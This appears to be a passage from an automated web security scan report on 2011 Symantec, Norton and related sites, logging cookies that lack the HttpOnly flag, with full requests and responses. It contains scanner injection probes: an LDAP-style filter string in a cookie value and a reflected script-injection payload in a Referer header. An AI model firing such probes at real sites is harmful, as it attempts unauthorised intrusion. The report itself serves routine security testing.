Set-Cookie: LANGUAGE=*)!(sn=*)!(sn=*; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: PROGRAMID=; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: CurrentSubChannelCookieName=Unknown; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 259

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://www.norton.com/onlinehelp">
...[SNIP]...

10.47. http://buy.symanteccloud.com/freetrial

Summary

Severity:   Information
Confidence:   Certain
Host:   http://buy.symanteccloud.com
Path:   /freetrial

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /freetrial HTTP/1.1
Host: buy.symanteccloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:38:21 GMT
Location: http://buy.symanteccloud.com/estore/mf/smbEmailTrialPage?sfid=LsGRTqHN43HsnsxPPpQZP3Tj9CJ21WWwv1yRwH0vnzd82cf97GNT!334566439!1315604301412
Set-Cookie: COUNTRY=US; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LANGUAGE=en; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID=; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=US; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: LANGUAGE=en; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: PROGRAMID=; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: TrafficSourceCookieName=other; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: JSESSIONID=LsGRTqHN43HsnsxPPpQZP3Tj9CJ21WWwv1yRwH0vnzd82cf97GNT!334566439; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close
Content-Length: 471

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://buy.symanteccloud.com/estor
...[SNIP]...

10.48. http://buy.symanteccloud.com/smbstore

Summary

Severity:   Information
Confidence:   Certain
Host:   http://buy.symanteccloud.com
Path:   /smbstore

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /smbstore HTTP/1.1
Host: buy.symanteccloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:38:21 GMT
Location: http://buy.symanteccloud.com/estore/mf/smbHomePage?sfid=BcWpTqHN0cLLbNtj50T02T9jsChhh86cK9wmykNgQsTJZ1p4QRP9!334566439!1315604301665
Set-Cookie: COUNTRY=US; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LANGUAGE=en; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID=; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=US; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: LANGUAGE=en; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: PROGRAMID=; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: TrafficSourceCookieName=other; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: JSESSIONID=BcWpTqHN0cLLbNtj50T02T9jsChhh86cK9wmykNgQsTJZ1p4QRP9!334566439; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close
Content-Length: 459

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://buy.symanteccloud.com/estor
...[SNIP]...

10.49. http://com-verisign.netmng.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://com-verisign.netmng.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?async=1&ref= HTTP/1.1
Host: com-verisign.netmng.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=78646006-8f5c-4a4b-87b8-c0cb592c83ce; cdb0=1.115936731645.5075.231152664.7153855158.0; cdbp=0,42,0; cdb1=; cdb2=; cdb3=; EVO5_OPT=1; evo5_VERISIGN=xep22ngsyerii%7CzPCBedpYRoO6OzhXoTF9q%2FaQjQpstH0WqFCxsh5%2B48J3547ECvJaebMq81oWRc3MP36Ne8FDKqi2tKvM0qAtvn5eUZVLjXQuMBCzsj9xlU6q8vkojmNUdsxdhJSq0RYJ%2FgEF5%2FA69puw0HLQJ9EPXM6sL1Ue6IGucoZYZgTJQnZo9CTdABHM4ueiLU%2FDJA8GIJKj5bIIOmyH%2FBCLQ0VIEg%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:24:39 GMT
Server: Apache/2.2.9
P3P: policyref="http://com-verisign.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Wed, 07 Sep 2011 21:24:39 GMT
Last-Modified: Wed, 07 Sep 2011 21:24:39 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5_VERISIGN=xep22ngsyerii%7ChA01%2FrwSc8JE1KL%2BNF3RVTo25kmnDoHeqB4wQZyhagZZu%2F%2BudZozezKeJLE7KBK%2BUjUxXlIeDROFZHLovHD35a7MzKnV4tnniULPz80oJzXTjZCQuH3rEYszto4j5kdWKlao%2B92ozzrCF1iFudKJH42aETL2etzFNY%2F7zPIZWcbiqGvcagHruGjsS4FSqBNpnzLrgd77H3EQG8j%2FXWqODQ%3D%3D; expires=Sat, 10-Mar-2012 21:24:39 GMT; path=/
Content-Length: 3418
Connection: close
Content-Type: text/html; charset=UTF-8

function json_encode(expr){var str='';switch(typeof(expr)){case"object":if(expr==null){str="null"}else if(expr.constructor==Date){str="\""+expr.getFullYear()+"-"+String(exp.getMonth()+100).substr(1)+"
...[SNIP]...

10.50. http://com-verisign.netmng.com//

Summary

Severity:   Information
Confidence:   Certain
Host:   http://com-verisign.netmng.com
Path:   //

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET //?function=nmHandshake&rand=0.2648393476847559&nm_input_data= HTTP/1.1
Host: com-verisign.netmng.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=78646006-8f5c-4a4b-87b8-c0cb592c83ce; cdb0=1.115936731645.5075.231152664.7153855158.0; cdbp=0,42,0; cdb1=; cdb2=; cdb3=; EVO5_OPT=1; evo5_VERISIGN=xep22ngsyerii%7COWn3FV9W0IGSJLrIppIRrZfSVe1We35EI4V4gBbixt8vL04ZKRREeQ778xI3DBjSo3Pq49K1cfcVvCg7qSIKn44I4XJ6cPR3Yj9Y3%2BMmEuQ5%2FYKzCkMnasBxmIRyKGTNYwlD1dvGPKbFxRFCvXppOCDQTBscyOfjUpXgtoyIAMmYbof2%2FajobILQpOxOi2Hs0x9UdZmRfM%2Fuoq9V0S17NeIqzDx%2BsP4gdfn5KCU%2F47pq%2B7rEF0aHB6ftFm0dez3T

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:28:22 GMT
Server: Apache/2.2.9
P3P: policyref="http://com-verisign.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Wed, 07 Sep 2011 21:28:22 GMT
Last-Modified: Wed, 07 Sep 2011 21:28:22 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5_VERISIGN=xep22ngsyerii%7COWn3FV9W0IGSJLrIppIRrZfSVe1We35EI4V4gBbixt8vL04ZKRREeQ778xI3DBjSo3Pq49K1cfcVvCg7qSIKn44I4XJ6cPR3Yj9Y3%2BMmEuQ5%2FYKzCkMnasBxmIRyKGTNYwlD1dvGPKbFxRFCvXppOCDQTBscyOfjUpXgtoyIAMmYbof2%2FajobILQpOxOi2Hs0x9UdZmRfM%2Fuoq9V0S17NeIqzDx%2BsP4gdfn5KCU%2F47pq%2B7rEF0aHB6ftFm0dez3T; expires=Sat, 10-Mar-2012 21:28:22 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


10.51. http://free.pctools.com/res/js/utils.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://free.pctools.com
Path:   /res/js/utils.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /res/js/utils.php HTTP/1.1
Host: free.pctools.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://free.pctools.com/free-antivirus36661%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E55a70ea0c85/
Cookie: reftrack=freesite%2320110909170147; PHPSESSID=68o0726o7nflfg28ire9iju5j2

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.3.4
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Fri, 09 Sep 2011 22:05:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 09 Sep 2011 22:05:27 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: referrer=deleted; expires=Thu, 09-Sep-2010 21:01:50 GMT; path=/; domain=.pctools.com
Set-Cookie: reftrack=freesite%2320110909170147; expires=Sat, 08-Sep-2012 21:01:51 GMT; path=/; domain=.pctools.com


10.52. http://mbox3.offermatica.com/m2/verisign/mbox/standard

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mbox3.offermatica.com
Path:   /m2/verisign/mbox/standard

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m2/verisign/mbox/standard?mboxHost=www.verisign.com&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxPage=1315621506825-922680&mboxXDomain=enabled&mboxCount=1&protocol=http%3A&serverDomain=www.verisign.com&referrer=none&mbox=VRSN_HP_AccBox_2011&mboxId=0&mboxURL=http%3A//www.verisign.com/&mboxReferrer=&mboxVersion=31 HTTP/1.1
Host: mbox3.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxPC=1315621455064-973488.19

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1315621455064-973488.19; Domain=offermatica.com; Expires=Sun, 09-Oct-2011 21:24:38 GMT; Path=/m2/verisign
Content-Type: text/javascript
Content-Length: 154
Date: Fri, 09 Sep 2011 21:24:37 GMT
Server: Test & Target

mboxFactoryDefault.get('VRSN_HP_AccBox_2011',0).setOffer(new mboxOfferDefault()).loaded();mboxFactoryDefault.getPCId().forceId("1315621455064-973488.19");

10.53. https://onlinefamily.norton.com/familysafety/basicpremium.fs

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlinefamily.norton.com
Path:   /familysafety/basicpremium.fs

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /familysafety/basicpremium.fs HTTP/1.1
Host: onlinefamily.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:45:30 GMT
Server: Apache
Set-Cookie: user_pref_lang=eng; Expires=Thu, 08-Dec-2011 21:45:30 GMT; Path=/
Set-Cookie: formVersion=1315604730862; Path=/
Cache-Control: no-cache,no-store,must-revalidate,max-stale=0
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Vary: Accept-Encoding
Content-Length: 41316


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>Web Moni
...[SNIP]...

10.54. http://renewals.symantec.com/renewals/application

Summary

Severity:   Information
Confidence:   Certain
Host:   http://renewals.symantec.com
Path:   /renewals/application

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /renewals/application HTTP/1.1
Host: renewals.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:21 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: entryURL=/renewals/application
Connection: close
Content-Length: 21430

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />


<!-- BEGIN
...[SNIP]...

10.55. https://renewals.symantec.com/renewals/application

Summary

Severity:   Information
Confidence:   Certain
Host:   https://renewals.symantec.com
Path:   /renewals/application

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store HTTP/1.1
Host: renewals.symantec.com
Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621879623-New%7C1336357879623%3B%20event69%3Devent69%7C1336357879625%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/5

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:50 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store
Content-Length: 21436

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />


<!-- BEGIN
...[SNIP]...

10.56. http://sales.liveperson.net/hc/2735064/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/2735064/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/2735064/?&site=2735064&cmd=mTagStartPage&lpCallId=480831184191-637837637215&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/landingProductFeatures%3Frdid%3D8504bbeb-1b35-477e-abfe-b3f645ab12841315603878013&id=3141287025&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&PV%21unit=norton-estore-us&PV%21iproducts=na&PV%21offered_sku_desc_int=na&PV%21pagename=store%3Aus%3Ahho%20mf%3Ahomepage%3Ahomepage&PV%21ucproduct=na&PV%21offered_sku_desc=na&PV%21billingerror=false&PV%21pageLoadTime=1%20sec&PV%21visitorActive=1&SV%21language=english&SV%21traffic_source=store%3Atrf_id%3Asymcom&SV%21current_subchannel=store%3Aonline%20%281st%29&SV%21language=en&SV%21site_id=store%3Aus&SV%21country=us&SV%21incoming_productSKU=&SV%21session_guid=359A5BC1-187B-E37B-9025-A486DEF7EF50&SV%21partner=store%3Asymantec&title=Norton%20Security%20-%20Antivirus%20Software%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=8504bbeb-1b35-477e-abfe-b3f645ab12841315603878013
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=3716944001314187740; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603882871

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: LivePersonID=-5110247826455-1315603885:0; expires=Sat, 08-Sep-2012 21:31:25 GMT; path=/hc/2735064; domain=.liveperson.net
Set-Cookie: HumanClickKEY=3716944001314187740; path=/hc/2735064
Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064
Set-Cookie: LivePersonID=-5110247826455-1315603885:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:31:25 GMT; path=/hc/2735064; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:31:25 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1998

lpConnLib.Process({"ResultSet": {"lpCallId":"480831184191-637837637215","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!updateButtonStatic_compact.js", "js_code": "function lpUpdateStaticButton
...[SNIP]...

10.57. http://sales.liveperson.net/hc/2735064/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/2735064/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/2735064/?&site=2735064&cmd=mTagKnockPage&lpCallId=570873120101-204310992732&protV=20&lpjson=1&id=244961581&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-norton-estore-us-english%7ClpMTagConfig.db1%7ClpButton%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://buy.norton.com/estore/mf/upgradeRenewal?rdid=2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=8455684308930202655; HumanClickSiteContainerID_2735064=STANDALONE; LivePersonID=-5110247826455-1315603884:-1:-1:-1:-1; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603882871

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1315603889280; expires=Sat, 10-Sep-2011 21:31:29 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:31:29 GMT
Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064
Set-Cookie: LivePersonID=-5110247826455-1315603885:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:31:29 GMT; path=/hc/2735064; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 29679

lpConnLib.Process({"ResultSet": {"lpCallId":"570873120101-204310992732","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

10.58. http://sales.liveperson.net/hc/2735064/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/2735064/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/2735064/?&site=2735064&cmd=mTagKnockPage&lpCallId=65178923542-457588254008&protV=20&lpjson=1&id=3141287025&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-norton-estore-us-english%7ClpMTagConfig.db1%7ClpButton%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=8504bbeb-1b35-477e-abfe-b3f645ab12841315603878013
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603879317

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:22 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=3716944001314187740; path=/hc/2735064
Set-Cookie: HumanClickACTIVE=1315603882871; expires=Sat, 10-Sep-2011 21:31:22 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:31:22 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 29678

lpConnLib.Process({"ResultSet": {"lpCallId":"65178923542-457588254008","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.ne
...[SNIP]...

10.59. http://sales.liveperson.net/hc/71097838/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/71097838/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/71097838/?&site=71097838&cmd=mTagStartPage&lpCallId=942795420530-312355306232&protV=20&lpjson=1&page=http%3A//www.symantec.com/store/resources/index.jsp%3Finid%3Dus_pagenotfound_smb_store&id=7891132346&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true&PV%21unit=store-business&PV%21Section=Shopping%20Resources&PV%21pageLoadTime=1%20sec&PV%21visitorActive=1&SV%21language=english&SV%21MarketTier=&SV%21ActivityCode=87117&SV%21store-business_ActivityCode=87117&SV%21RequestACallURL=http%3A//www4.symantec.com/Vrt/wl%3Ftu_id%3DeeiX12537391&SV%21store-business_RequestACallURL=http%3A//www4.symantec.com/Vrt/wl%3Ftu_id%3DeeiX12537391&title=Store%20Shopping%20Resources%20-%20Symantec%20Corp.&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cookie=s_vi%3D%5BCS%5Dv1%7C2735422985161DC5-600001A3801B01DD%5BCE%5D%3B%20s_pers%3D%2520s_nr%253D1315621903651-New%257C1336357903651%253B%2520event69%253Devent69%257C1336357903652%253B%3B%20s_sess%3D%2520s_sv_sid%253D806960442771%253B%2520s_